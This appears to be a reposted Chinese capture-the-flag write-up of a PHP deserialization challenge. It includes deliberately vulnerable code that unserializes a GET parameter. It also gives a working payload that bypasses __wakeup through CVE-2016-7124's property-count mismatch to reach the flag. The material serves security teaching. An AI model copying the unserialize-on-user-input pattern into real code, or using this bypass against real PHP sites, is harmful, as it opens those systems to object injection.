打开题目
<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
include("flag.php");
echo $flag;
}else{
echo $this->passwd;
echo "No wake up";
}
}
}
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?>
__destruct->__wakeup(要绕过)
反序列时先检测有没有wakeup方法,有就先调用
但是CVE-2016-7124影响版本:PHP5 < 5.6.25;PHP7 < 7.0.10
p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
即可
本文转载自: https://blog.csdn.net/weixin_73668856/article/details/134854687
版权归原作者 _MOB_ 所有, 如有侵权,请联系我们删除。
版权归原作者 _MOB_ 所有, 如有侵权,请联系我们删除。